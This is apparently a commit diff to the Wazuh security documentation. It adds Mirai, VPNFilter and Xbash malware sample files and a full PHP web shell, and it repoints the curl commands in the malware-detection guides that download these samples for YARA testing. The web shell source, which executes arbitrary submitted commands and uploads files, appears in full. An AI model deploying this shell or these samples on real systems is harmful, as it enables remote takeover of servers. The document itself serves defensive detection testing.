diff --git a/CHANGELOG.md b/CHANGELOG.md
index 74ab8bbf5e..42fff29ea5 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -14,6 +14,7 @@ All notable changes to this project will be documented in this file.
- **Post-release**: Added indexer connector configuration steps to vulnerability detection documentation and removed troubleshooting section. ([#8942](https://github.com/wazuh/wazuh-documentation/pull/8942))
- **Post-release**: Updated the *Navigating the Wazuh dashboard* section. ([#8950](https://github.com/wazuh/wazuh-documentation/pull/8950))
- **Post-release**: Updated the System inventory documentation. ([#8955](https://github.com/wazuh/wazuh-documentation/pull/8955))
+- **Post-release**: Updated the URLs of malware samples. ([#8961](https://github.com/wazuh/wazuh-documentation/pull/8961))
### Fixed
diff --git a/resources/samples/mirai b/resources/samples/mirai
new file mode 100644
index 0000000000..ca15b985d4
Binary files /dev/null and b/resources/samples/mirai differ
diff --git a/resources/samples/vpn_filter b/resources/samples/vpn_filter
new file mode 100644
index 0000000000..ff5bdcc7cb
Binary files /dev/null and b/resources/samples/vpn_filter differ
diff --git a/resources/samples/webshell b/resources/samples/webshell
new file mode 100644
index 0000000000..1c068aa2be
--- /dev/null
+++ b/resources/samples/webshell
@@ -0,0 +1,70 @@
+body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}";
+print "#worst @dal.net
";
+print "You have been hack By Shany with Love To #worst.
";
+print "Watch Your system Shany was here.
";
+print "Linux Shells
";
+print "
";
+
+$currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
+$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
+
+$UName = `uname -a`;
+$SCWD = `pwd`;
+$UserID = `id`;
+
+if( $currentWD == "" ) {
+ $currentWD = $SCWD;
+}
+
+print "";
+print "| We are: | ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].") |
";
+print "| Server is: | ".$_SERVER['SERVER_SIGNATURE']." |
";
+print "| System type: | $UName |
";
+print "| Our permissions: | $UserID |
";
+print "
";
+
+print "
";
+
+if( $_POST['_act'] == "List files!" ) {
+ $currentCMD = "ls -la";
+}
+
+print "
";
+
+$currentCMD = str_replace("\\\"","\"",$currentCMD);
+$currentCMD = str_replace("\\\'","\'",$currentCMD);
+
+if( $_POST['_act'] == "Upload!" ) {
+ if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
+ print "Error while uploading file!";
+ } else {
+ print "";
+ system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
+ print "File uploaded successfully!";
+ }
+} else {
+ print "\n\n\n\n";
+ $currentCMD = "cd ".$currentWD.";".$currentCMD;
+ system($currentCMD);
+ print "\n
\n\n\n
Command completed";
+}
+
+exit;
+
+?>
+
diff --git a/resources/samples/xbash b/resources/samples/xbash
new file mode 100644
index 0000000000..0b414d8ed8
Binary files /dev/null and b/resources/samples/xbash differ
diff --git a/source/proof-of-concept-guide/detect-malware-yara-integration.rst b/source/proof-of-concept-guide/detect-malware-yara-integration.rst
index b90f7c7b0f..4cf77e11fc 100644
--- a/source/proof-of-concept-guide/detect-malware-yara-integration.rst
+++ b/source/proof-of-concept-guide/detect-malware-yara-integration.rst
@@ -283,25 +283,25 @@ Attack emulation
# Mirai
echo "# Mirai: https://en.wikipedia.org/wiki/Mirai_(malware)"
echo "Downloading malware sample..."
- fetch_sample "https://wazuh-demo.s3-us-west-1.amazonaws.com/mirai" "/tmp/yara/malware/mirai" && echo "Done!" || echo "Error while downloading."
+ fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/mirai" "/tmp/yara/malware/mirai" && echo "Done!" || echo "Error while downloading."
echo
# Xbash
echo "# Xbash: https://unit42.paloaltonetworks.com/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
echo "Downloading malware sample..."
- fetch_sample "https://wazuh-demo.s3-us-west-1.amazonaws.com/xbash" "/tmp/yara/malware/xbash" && echo "Done!" || echo "Error while downloading."
+ fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/xbash" "/tmp/yara/malware/xbash" && echo "Done!" || echo "Error while downloading."
echo
# VPNFilter
echo "# VPNFilter: https://news.sophos.com/en-us/2018/05/24/vpnfilter-botnet-a-sophoslabs-analysis/"
echo "Downloading malware sample..."
- fetch_sample "https://wazuh-demo.s3-us-west-1.amazonaws.com/vpn_filter" "/tmp/yara/malware/vpn_filter" && echo "Done!" || echo "Error while downloading."
+ fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/vpn_filter" "/tmp/yara/malware/vpn_filter" && echo "Done!" || echo "Error while downloading."
echo
# Webshell
echo "# WebShell: https://github.com/SecWiki/WebShell-2/blob/master/Php/Worse%20Linux%20Shell.php"
echo "Downloading malware sample..."
- fetch_sample "https://wazuh-demo.s3-us-west-1.amazonaws.com/webshell" "/tmp/yara/malware/webshell" && echo "Done!" || echo "Error while downloading."
+ fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/webshell" "/tmp/yara/malware/webshell" && echo "Done!" || echo "Error while downloading."
echo
fi
diff --git a/source/proof-of-concept-guide/leveraging-llms-for-alert-enrichment.rst b/source/proof-of-concept-guide/leveraging-llms-for-alert-enrichment.rst
index 6fcf1e0dab..4772510eeb 100644
--- a/source/proof-of-concept-guide/leveraging-llms-for-alert-enrichment.rst
+++ b/source/proof-of-concept-guide/leveraging-llms-for-alert-enrichment.rst
@@ -633,9 +633,9 @@ Run the following commands on the Ubuntu endpoint to download malware samples to
.. code-block:: console
- # curl "https://wazuh-demo.s3-us-west-1.amazonaws.com/mirai" > /home/mirai
- # curl "https://wazuh-demo.s3-us-west-1.amazonaws.com/xbash" > /home/xbash
- # curl "https://wazuh-demo.s3-us-west-1.amazonaws.com/webshell" > /home/webshell
+ # curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/mirai" > /home/mirai
+ # curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/xbash" > /home/xbash
+ # curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/webshell" > /home/webshell
You can visualize the alert data in the Wazuh dashboard. To do this, go to the **Modules** > **Security events** tab and add the ``rule.groups:yara`` filter in the search bar to query the alerts.
@@ -668,9 +668,9 @@ Run the following commands via PowerShell to download malware samples to the mon
.. code-block:: powershell
- > curl "https://wazuh-demo.s3-us-west-1.amazonaws.com/mirai" -o $env:USERPROFILE\Downloads\mirai
- > curl "https://wazuh-demo.s3-us-west-1.amazonaws.com/xbash" -o $env:USERPROFILE\Downloads\xbash
- > curl "https://wazuh-demo.s3-us-west-1.amazonaws.com/webshell" -o $env:USERPROFILE\Downloads\webshell
+ > curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/mirai" -o $env:USERPROFILE\Downloads\mirai
+ > curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/xbash" -o $env:USERPROFILE\Downloads\xbash
+ > curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/webshell" -o $env:USERPROFILE\Downloads\webshell
You can visualize the alert data in the Wazuh dashboard. To do this, go to the **Security events** module and add the filter in the search bar to query the alerts.
diff --git a/source/user-manual/capabilities/malware-detection/cdb-lists-threat-intelligence.rst b/source/user-manual/capabilities/malware-detection/cdb-lists-threat-intelligence.rst
index 94b70682e1..ded116405a 100644
--- a/source/user-manual/capabilities/malware-detection/cdb-lists-threat-intelligence.rst
+++ b/source/user-manual/capabilities/malware-detection/cdb-lists-threat-intelligence.rst
@@ -118,8 +118,8 @@ To test that everything works correctly, download the *Mirai* and *Xbash* malwar
.. code-block:: console
- $ sudo curl https://wazuh-demo.s3-us-west-1.amazonaws.com/mirai --output /mirai
- $ sudo curl https://wazuh-demo.s3-us-west-1.amazonaws.com/xbash --output /Xbash
+ $ sudo curl https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/mirai --output /mirai
+ $ sudo curl https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/xbash --output /Xbash
Visualize the alerts
^^^^^^^^^^^^^^^^^^^^
diff --git a/source/user-manual/capabilities/malware-detection/fim-yara.rst b/source/user-manual/capabilities/malware-detection/fim-yara.rst
index 94c5a75256..6217ab931c 100644
--- a/source/user-manual/capabilities/malware-detection/fim-yara.rst
+++ b/source/user-manual/capabilities/malware-detection/fim-yara.rst
@@ -319,8 +319,8 @@ To test that everything is working correctly, we use the *Mirai* and *Xbash* mal
.. code-block:: console
- $ curl https://wazuh-demo.s3-us-west-1.amazonaws.com/mirai --output ~/mirai
- $ curl https://wazuh-demo.s3-us-west-1.amazonaws.com/xbash --output ~/Xbash
+ $ curl https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/mirai --output ~/mirai
+ $ curl https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/xbash --output ~/Xbash
$ sudo mv ~/mirai /root/
$ sudo mv ~/Xbash /root/